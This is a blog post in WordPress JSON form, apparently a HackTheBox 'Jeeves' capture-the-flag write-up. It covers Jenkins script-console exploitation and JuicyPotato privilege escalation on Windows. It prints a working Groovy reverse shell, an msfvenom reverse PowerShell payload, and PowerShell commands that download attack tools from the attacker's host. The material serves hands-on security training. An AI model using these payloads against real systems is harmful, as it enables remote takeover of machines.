{"id":605,"date":"2020-09-15T17:26:19","date_gmt":"2020-09-15T16:26:19","guid":{"rendered":"http:\/\/vroamam.com\/wordpress\/?p=605"},"modified":"2020-10-17T11:53:13","modified_gmt":"2020-10-17T10:53:13","slug":"jeeves-htb-write-up","status":"publish","type":"post","link":"https:\/\/vroamam.com\/wordpress\/blog\/jeeves-htb-write-up\/","title":{"rendered":"Jeeves &#8211; HTB Writeup"},"content":{"rendered":"\n<h2 class=\"wp-block-heading\">Enumeration<\/h2>\n\n\n\n<p>I ran a typical opening Nmap scan <\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nmap -sS -sC -sV -O -p- -vv 10.10.10.63 -oA ~\/HTB\/Jeeves\/Jeeves<\/code><\/pre>\n\n\n\n<p>The Nmap scan shows the following ports open, I&#8217;ve emboldened what I thought was interesting<\/p>\n\n\n\n<pre class=\"wp-block-preformatted\">PORT      STATE SERVICE    REASON          VERSION \n<strong>80\/tcp<\/strong>    open  http       syn-ack ttl 127 Microsoft IIS httpd 10.0 \n| http-methods:  \n|   Supported Methods: OPTIONS TRACE GET HEAD POST \n|_  Potentially risky methods: TRACE \n|<em><strong>http-server-header: Microsoft-IIS\/10.0<\/strong> <\/em>\n<em>|_http-title: Ask Jeeves <\/em>\n<em><strong>135\/tcp<\/strong>   open  msrpc        syn-ack ttl 127 Microsoft Windows RPC <strong>445\/tcp<\/strong>   open  microsoft-ds syn-ack ttl 127 Microsoft Windows 7 - 10 microsoft-ds (workgroup: WORKGROUP) 50000\/tcp open  http         syn-ack ttl 127 Jetty 9.4.z-SNAPSHOT <\/em>\n<em>|<\/em><strong>http-server-header: Jetty(9.4.z-SNAPSHOT)<\/strong> |_http-title: Error 404 Not Found<\/pre>\n\n\n\n<p>So we have a website on port 80, some SMB and a non-iis web server on 50000 listed as &#8211; Jetty 9.4.z-SNAPSHOT<\/p>\n\n\n\n<h4 class=\"wp-block-heading\">Testing SMB<\/h4>\n\n\n\n<p>I ran smbclient and attempted to anonymously list shares, I got access denied<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"405\" height=\"87\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image.png\" alt=\"\" class=\"wp-image-609\"\/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\">Enumerating the Website(s)<\/h4>\n\n\n\n<p>Lets have a look at the website in more detail, it&#8217;s running the &#8220;ask jeeves&#8221; search engine:<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1109\" height=\"493\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-1.png\" alt=\"\" class=\"wp-image-610\" srcset=\"https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-1.png 1109w, https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-1-1000x445.png 1000w, https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-1-768x341.png 768w\" sizes=\"auto, (max-width: 1109px) 100vw, 1109px\" \/><\/figure>\n\n\n\n<p>clicking the links goes nowhere and searching for the anything causes an error page &#8216;error.html&#8217;. Looking more closely this is an image of an IIS erorr rather than actual  errors.<\/p>\n\n\n\n<p>It suggests we are using SQL Server 2005 on Windows NT5.0 (Build  2195:Service Pack 4) and I note this &#8220;just in case&#8221;, but I was aware that Nmap indicated we were using IIS 10.0 so not likely to be of much use.<\/p>\n\n\n\n<p>Browsing to the  site on 50000 gave a 404 error<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"433\" height=\"334\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-2.png\" alt=\"\" class=\"wp-image-611\"\/><\/figure>\n\n\n\n<p>The link on the page takes you to <a href=\"http:\/\/www.eclipse.org\/jetty\/\">http:\/\/www.eclipse.org\/jetty\/<\/a><\/p>\n\n\n\n<p>Nikto  produced nothing of consequence.<\/p>\n\n\n\n<p>At this point I thought it was time to see if there were any hidden directories or files so I ran DirBuster<\/p>\n\n\n\n<p>Running DirBuster on <a href=\"http:\/\/10.10.10.63:50000\">http:\/\/10.10.10.63:50000<\/a> we find a folder called askjeeves<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"778\" height=\"552\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-3.png\" alt=\"\" class=\"wp-image-612\" srcset=\"https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-3.png 778w, https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-3-768x545.png 768w\" sizes=\"auto, (max-width: 778px) 100vw, 778px\" \/><\/figure>\n\n\n\n<p>if we browse to <a href=\"http:\/\/10.10.10.63:50000\/askjeeves\">http:\/\/10.10.10.63:50000\/askjeeves<\/a> we are presented with a menu we can add items, people, view the build history and manage the system.<\/p>\n\n\n\n<p>On the manage Jenkins page we see some options<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1334\" height=\"900\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-4.png\" alt=\"\" class=\"wp-image-613\" srcset=\"https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-4.png 1334w, https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-4-1000x675.png 1000w, https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-4-768x518.png 768w\" sizes=\"auto, (max-width: 1334px) 100vw, 1334px\" \/><\/figure>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Initial Foothold<\/h2>\n\n\n\n<h4 class=\"wp-block-heading\"><strong>Possible Software Exploits<\/strong><\/h4>\n\n\n\n<p><strong>From Rapid 7 &#8211; RCE<\/strong><br>Certain versions of Jetty do not correctly sanitize backslash  characters in URL requests to the &#8216;\/cgi-bin&#8217; directory. As a result, a  remote attacker can execute arbitrary binaries anywhere the web server  has access to.<\/p>\n\n\n\n<p><strong>From Exploit-DB &#8211; Directory Traversal<\/strong><br>source: <a href=\"https:\/\/www.securityfocus.com\/bid\/50723\/info\">https:\/\/www.securityfocus.com\/bid\/50723\/info<\/a><\/p>\n\n\n\n<p>Jetty Web Server is prone to a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.<\/p>\n\n\n\n<p>Exploiting this issue will allow an attacker to view arbitrary files  within the context of the webserver. Information harvested may aid in  launching further attacks.<\/p>\n\n\n\n<p>Example:<br><a href=\"http:\/\/www.example.com:9084\/vci\/downloads\/\">http:\/\/www.example.com:9084\/vci\/downloads\/<\/a>&#8230;&#8230;&#8230;&#8230;&#8230;\\Documents and Settings\\All Users\\Application Data\\VMware\\VMware VirtualCenter\\SSL\\rui.key<\/p>\n\n\n\n<p>I tried a few times to run the metasploit module with no success and  tried to do some directory traversal with equally poor success. <\/p>\n\n\n\n<p><strong>Website<\/strong><br>Of particular interest is the Script Console (I highlighted this in the enumeration<string> section above). If we can run scripts maybe we can abuse that and get a shell. <\/string><\/p>\n\n\n\n<p><string>Loading the script console we see this page<\/string><\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1565\" height=\"724\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-6.png\" alt=\"\" class=\"wp-image-615\" srcset=\"https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-6.png 1565w, https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-6-1000x463.png 1000w, https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-6-768x355.png 768w, https:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-6-1536x711.png 1536w\" sizes=\"auto, (max-width: 1565px) 100vw, 1565px\" \/><\/figure>\n\n\n\n<p>It seems we can run scripts. I have no knowledge of groovy so I did a small search and found this site <a href=\"https:\/\/www.hackingarticles.in\/exploiting-jenkins-groovy-script-console-in-multiple-ways\/\">https:\/\/www.hackingarticles.in\/exploiting-jenkins-groovy-script-console-in-multiple-ways\/<\/a> which explains how to get a reverse shell but the code didn&#8217;t copy well.<\/p>\n\n\n\n<p> A new search took me here <a href=\"https:\/\/gist.github.com\/frohoff\/fed1ffaab9b9beeb1c76\">https:\/\/gist.github.com\/frohoff\/fed1ffaab9b9beeb1c76<\/a> so I copied the code from here. I have pasted it below. This will produce a reverse shell in a netcat listener. Change &#8220;String Host&#8221; to your LHOST IP  address and the port to whatever port is useable on your attacking system<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>String host=\"10.10.14.12\";\nint port=8044;\nString cmd=\"cmd.exe\";\nProcess p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();<\/code><\/pre>\n\n\n\n<p>Setup a netcat listener<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc 10.10.14.12 8044<\/code><\/pre>\n\n\n\n<p><br> Paste the code into the Jenkins console<br> click run<\/p>\n\n\n\n<p>We have a shell. You can fetch the user flag from the user (kohsuke) desktop<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"403\" height=\"199\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-7.png\" alt=\"\" class=\"wp-image-616\"\/><\/figure>\n\n\n\n<h4 class=\"wp-block-heading\" id=\"using-msfconsole\">Using msfconsole<\/h4>\n\n\n\n<p>metasploit has a module for the jenkins console. I couldn&#8217;t get it to work.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>use exploit\/multi\/http\/jenkins_script_console<\/code><\/pre>\n\n\n\n<hr class=\"wp-block-separator\"\/>\n\n\n\n<h2 class=\"wp-block-heading\">Privilege Escalation<\/h2>\n\n\n\n<p>So we have a user shell. Looking at the user account we are a user named kohsuke<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"394\" height=\"69\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-8.png\" alt=\"\" class=\"wp-image-618\"\/><\/figure>\n\n\n\n<p>A normal user with no admin privileges, just a member of the normal users group<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"446\" height=\"498\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-9.png\" alt=\"\" class=\"wp-image-619\"\/><\/figure>\n\n\n\n<p>We do however have the impersonate privilege.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"733\" height=\"283\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-10.png\" alt=\"\" class=\"wp-image-620\"\/><\/figure>\n\n\n\n<p>And we can run sysinfo<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"746\" height=\"722\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-11.png\" alt=\"\" class=\"wp-image-621\"\/><\/figure>\n\n\n\n<p>Sysinfo provides a way to look for privesc paths. We can take a copy of the output and paste to a file and use <a href=\"http:\/\/windows-exploit-suggester.py\">windows-exploit-suggester.py<\/a> to look at possible escalation paths<\/p>\n\n\n\n<p>I was doing a potato attack module in TCM <a href=\"https:\/\/www.udemy.com\/course\/windows-privilege-escalation-for-beginners\/\">Windows privilege escalation course<\/a> &#8211; it was a fair bet I was supposed to use the potato attack. I think though it is also reasonable to assume, if we have the impersonate privilege trying a potato attack makes sense.<\/p>\n\n\n\n<p>In this instance, I found a simple guide that used <a href=\"https:\/\/www.udemy.com\/course\/windows-privilege-escalation-for-beginners\/learn\/lecture\/19327888#questions\/10519838\/\">JuicyPotato here <\/a>and if you really want an in depth explanation on potato attacks, there is a really good post <a href=\"https:\/\/foxglovesecurity.com\/2016\/09\/26\/rotten-potato-privilege-escalation-from-service-accounts-to-system\/\">here <\/a><\/p>\n\n\n\n<p>I created the <em>msfvenom<\/em> payload and the batch (bat) file then used a python webserver and Powershell to grab them both. Its worth noting that the link to the binaries in the README.md file is broken So I\u2019ve put a download link on this page.<\/p>\n\n\n\n<p><a href=\"https:\/\/github.com\/ohpe\/juicy-potato\/releases\">Download<\/a> the JuicyPotato executable<\/p>\n\n\n\n<p>Create a reverse shell using <em>msfvenom<\/em>.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>msfvenom -p cmd\/windows\/reverse_powershell lhost=10.10.14.25 lport=4567 > shell.bat<\/code><\/pre>\n\n\n\n<p>Start the webserver on your attacking machine<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>python -m SimpleHTTPServer 8000<\/code><\/pre>\n\n\n\n<p>In your target machine user shell, copy\/paste or type the Powershell commands below to fetch the files. Replace the IP address with your webserver IP.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell -c \"wget http:\/\/10.10.14.25:8000\/JuicyPotato.exe -OutFile .\\JP.exe\"<\/code><\/pre>\n\n\n\n<pre class=\"wp-block-code\"><code>powershell -c \"wget http:\/\/10.10.14.25:8000\/shell.bat -OutFile .\\shell.bat\"<\/code><\/pre>\n\n\n\n<p>start a netcat listener on your attacker machine. Change the port to the one you set in your <em>msfvenom<\/em> payload<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>nc -nvlp 4567<\/code><\/pre>\n\n\n\n<p>run the attack<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>JP.exe -l 1234 -p shell.bat -t * <\/code><\/pre>\n\n\n\n<p>you should see the payload run in your shell window<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"514\" height=\"194\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-12.png\" alt=\"\" class=\"wp-image-622\"\/><\/figure>\n\n\n\n<p>And your system shell should pop in netcat<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"507\" height=\"128\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-13.png\" alt=\"\" class=\"wp-image-623\"\/><\/figure>\n\n\n\n<p>I was all excited at this point and headed straight to the Admin desktop to find there was no root.txt there was only an hm.txt &#8211; typing this out tells us we have to look deeper<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"507\" height=\"386\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-14.png\" alt=\"\" class=\"wp-image-624\"\/><\/figure>\n\n\n\n<p>I tried to run a search using DIR<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd c:\\\ndir root.txt \/S<\/code><\/pre>\n\n\n\n<p>and I also tried<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>where \/R \\ root.txt<\/code><\/pre>\n\n\n\n<p>but neither found any files.<\/p>\n\n\n\n<p>I ran both again using root.* as the pattern, but all that was found  was an xml file. I had a look but it wasn&#8217;t the flag.<\/p>\n\n\n\n<p>I recalled a feature in windows called Alternate Data Stream. I didn&#8217;t know if I could search and recurse through datastreams, but a gut instinct told me it would be on the desktop where the noral root flag is so I decided to look there.<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>cd \\user\\administrator\\desktop\ndir \/R *.*<\/code><\/pre>\n\n\n\n<p>the command <code>dir \/R *.*<\/code> shows all data streams<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"589\" height=\"294\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-15.png\" alt=\"\" class=\"wp-image-625\"\/><\/figure>\n\n\n\n<p>As you can see there is an ADS. I tried to type that out<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"571\" height=\"111\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-16.png\" alt=\"\" class=\"wp-image-626\"\/><\/figure>\n\n\n\n<p>Well that didn&#8217;t work so what can we do&#8230; I piped it to more, if you have a better idea drop it in the comments (please)<\/p>\n\n\n\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"574\" height=\"117\" src=\"http:\/\/vroamam.com\/wordpress\/wp-content\/uploads\/2020\/09\/image-17.png\" alt=\"\" class=\"wp-image-627\"\/><\/figure>\n\n\n\n<p>and that is Jeeves done.<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Enumeration I ran a typical opening Nmap scan The Nmap scan shows the following ports open, I&#8217;ve emboldened what I thought was interesting PORT STATE SERVICE REASON VERSION 80\/tcp open http syn-ack ttl 127 Microsoft IIS httpd 10.0 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |http-server-header: Microsoft-IIS\/10.0 [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"ocean_post_layout":"","ocean_both_sidebars_style":"","ocean_both_sidebars_content_width":0,"ocean_both_sidebars_sidebars_width":0,"ocean_sidebar":"","ocean_second_sidebar":"","ocean_disable_margins":"enable","ocean_add_body_class":"","ocean_shortcode_before_top_bar":"","ocean_shortcode_after_top_bar":"","ocean_shortcode_before_header":"","ocean_shortcode_after_header":"","ocean_has_shortcode":"","ocean_shortcode_after_title":"","ocean_shortcode_before_footer_widgets":"","ocean_shortcode_after_footer_widgets":"","ocean_shortcode_before_footer_bottom":"","ocean_shortcode_after_footer_bottom":"","ocean_display_top_bar":"default","ocean_display_header":"default","ocean_header_style":"","ocean_center_header_left_menu":"","ocean_custom_header_template":"","ocean_custom_logo":0,"ocean_custom_retina_logo":0,"ocean_custom_logo_max_width":0,"ocean_custom_logo_tablet_max_width":0,"ocean_custom_logo_mobile_max_width":0,"ocean_custom_logo_max_height":0,"ocean_custom_logo_tablet_max_height":0,"ocean_custom_logo_mobile_max_height":0,"ocean_header_custom_menu":"","ocean_menu_typo_font_family":"","ocean_menu_typo_font_subset":"","ocean_menu_typo_font_size":0,"ocean_menu_typo_font_size_tablet":0,"ocean_menu_typo_font_size_mobile":0,"ocean_menu_typo_font_size_unit":"px","ocean_menu_typo_font_weight":"","ocean_menu_typo_font_weight_tablet":"","ocean_menu_typo_font_weight_mobile":"","ocean_menu_typo_transform":"","ocean_menu_typo_transform_tablet":"","ocean_menu_typo_transform_mobile":"","ocean_menu_typo_line_height":0,"ocean_menu_typo_line_height_tablet":0,"ocean_menu_typo_line_height_mobile":0,"ocean_menu_typo_line_height_unit":"","ocean_menu_typo_spacing":0,"ocean_menu_typo_spacing_tablet":0,"ocean_menu_typo_spacing_mobile":0,"ocean_menu_typo_spacing_unit":"","ocean_menu_link_color":"","ocean_menu_link_color_hover":"","ocean_menu_link_color_active":"","ocean_menu_link_background":"","ocean_menu_link_hover_background":"","ocean_menu_link_active_background":"","ocean_menu_social_links_bg":"","ocean_menu_social_hover_links_bg":"","ocean_menu_social_links_color":"","ocean_menu_social_hover_links_color":"","ocean_disable_title":"default","ocean_disable_heading":"default","ocean_post_title":"","ocean_post_subheading":"","ocean_post_title_style":"","ocean_post_title_background_color":"","ocean_post_title_background":0,"ocean_post_title_bg_image_position":"","ocean_post_title_bg_image_attachment":"","ocean_post_title_bg_image_repeat":"","ocean_post_title_bg_image_size":"","ocean_post_title_height":0,"ocean_post_title_bg_overlay":0.5,"ocean_post_title_bg_overlay_color":"","ocean_disable_breadcrumbs":"default","ocean_breadcrumbs_color":"","ocean_breadcrumbs_separator_color":"","ocean_breadcrumbs_links_color":"","ocean_breadcrumbs_links_hover_color":"","ocean_display_footer_widgets":"default","ocean_display_footer_bottom":"default","ocean_custom_footer_template":"","ocean_post_oembed":"","ocean_post_self_hosted_media":"","ocean_post_video_embed":"","ocean_link_format":"","ocean_link_format_target":"self","ocean_quote_format":"","ocean_quote_format_link":"post","ocean_gallery_link_images":"on","ocean_gallery_id":[],"footnotes":""},"categories":[87,2,86,3],"tags":[88,6,85,91,95,96],"class_list":["post-605","post","type-post","status-publish","format-standard","hentry","category-ctf","category-cybersec","category-hackthebox","category-training","tag-ctf","tag-ethical-hacking","tag-hackthebox","tag-htb","tag-potato-attack","tag-windows-impersonate","entry"],"_links":{"self":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/605","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/comments?post=605"}],"version-history":[{"count":13,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/605\/revisions"}],"predecessor-version":[{"id":637,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/posts\/605\/revisions\/637"}],"wp:attachment":[{"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/media?parent=605"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/categories?post=605"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/vroamam.com\/wordpress\/wp-json\/wp\/v2\/tags?post=605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}